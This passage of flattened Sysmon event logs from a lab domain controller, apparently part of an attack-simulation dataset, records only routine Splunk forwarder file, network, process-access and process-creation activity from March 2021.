Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30499F9D7E53D995E1165170176466CA,SHA256=6C3CD029093AB8DDB4C771BF30F3CFBE1159B74EDE779FF51CCF2A7FD845594A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200479Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:51.364{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6721A5EC9C11317074C6E7F6E0524763,SHA256=92224556FCE3318B6B840A62FC48B9B089875C4098EDB15D40470DD5543986B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200481Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:52.380{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A944137745F47AF3B2780C05ED798D9E,SHA256=98699F669DBD40D43013F11BCC79A774CD375E9BB1833CB048F9F9E35BBEB2E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200480Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:52.130{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E1F0BCA38BCE2C9DBD02F9E1CD501647,SHA256=077972F03A9C6AEF4E5889D0F2CDFB590AC6D8F8E4804E77D955270BC5E9243C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200483Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:48.952{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55130-false10.0.1.12-8000- 23542300x80000000000000002200482Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:53.396{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B512DED2A68D8C299F9C65598942F92,SHA256=54D282C25C36A077D2D2AE82C3E33C03B473EBF817BFC839EDB0C6C2825EFADD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200484Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:54.411{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=017DFD65A0740AFD4EDF631B27A3DB5E,SHA256=D7FC11802CD5D9BE58620DDFB9AD7822C35652BDC8D3FAE902B07EB1881798E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200485Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:55.458{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4CE1615D3E0FA820B4956DAB69F3926E,SHA256=BBB76584669D58B84A259D2BECC307239EC427612B4D993EF0F61C6776488C30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200487Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:56.818{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DCB2812007D08189B93D9D14AEFD2C97,SHA256=57EE71CB8E612877E099013D0536C9A275BF651ABE0875421AB55DF139171DF4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200486Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:56.489{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D772F9A4BCAE2260D26788E8D1511418,SHA256=DC82482D1AEEE0B6A4B31987B0D3346BEFF44CDAECC9ED0B11B78F4F0FCDD16F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200491Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:53.952{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55132-false10.0.1.12-8000- 354300x80000000000000002200490Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:53.827{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local55131-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local389ldap 354300x80000000000000002200489Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:53.827{5ABCFE62-843F-603E-3000-00000000AD01}2464C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local55131-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local389ldap 23542300x80000000000000002200488Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:57.521{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED033D4EFF3FD719623D60706F5A3EA0,SHA256=0E14FFFCD32F3C005D69252FDA48D37A99545D43986873ABDD780B7558C065F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200492Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:58.522{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0ECE45853570A0149792AED0F69152A,SHA256=4E74BBB4AD5E99FBD3F20B9D83D12B7030C523BEC6B6FC5ED5BF5852E7452244,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200493Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:59.584{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68C59D397876122D3E0575E8B617BDF9,SHA256=136B7095368070DA401277109F5AECF5AEB47E86A4DBD000EE12693605508D4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200494Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:00.597{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=796FF41529648EE998A71872F2F2C2CE,SHA256=5FFBC8ABD444F5DFF6A51F4EABF8EC542EF2EB116F62F7A3A9707810D49D9926,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200495Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:01.597{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FBD03D40FC054A683ECE7FC3636A304,SHA256=FA3FA62E2CD3F5A6AC44024D78934B5C363DB8A419175AE9014DC2C6D0A26648,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200516Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:58.966{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55133-false10.0.1.12-8000- 10341000x80000000000000002200515Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:02.850{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E67A-6040-E04D-00000000AD01}4980C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200514Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:02.850{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200513Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:02.850{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200512Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:02.850{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200511Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:02.850{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200510Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:02.850{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E67A-6040-E04D-00000000AD01}4980C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002200509Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:02.850{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E67A-6040-E04D-00000000AD01}4980C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002200508Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:02.851{5ABCFE62-E67A-6040-E04D-00000000AD01}4980C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002200507Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:02.600{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C42F95F3E652BF84CCEB7812A569E727,SHA256=0F4BB1F34782F240AA4E2584150EF6D274A7CCDB65745A8CE7EBD095994AF04B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002200506Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:02.475{5ABCFE62-E67A-6040-DF4D-00000000AD01}54805092C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200505Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:02.303{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E67A-6040-DF4D-00000000AD01}5480C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200504Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:02.303{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200503Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:02.303{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200502Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:02.303{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200501Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:02.303{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200500Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:02.303{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E67A-6040-DF4D-00000000AD01}5480C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002200499Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:02.303{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E67A-6040-DF4D-00000000AD01}5480C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002200498Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:02.304{5ABCFE62-E67A-6040-DF4D-00000000AD01}5480C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002200497Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:02.163{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FAB30BE51586F09922278F1BDFF234E4,SHA256=C5E2029DE2D10A2FEE6C9A1760F735C234AC68B4B6BFFCB220B7D4E603173D09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200496Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:02.163{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 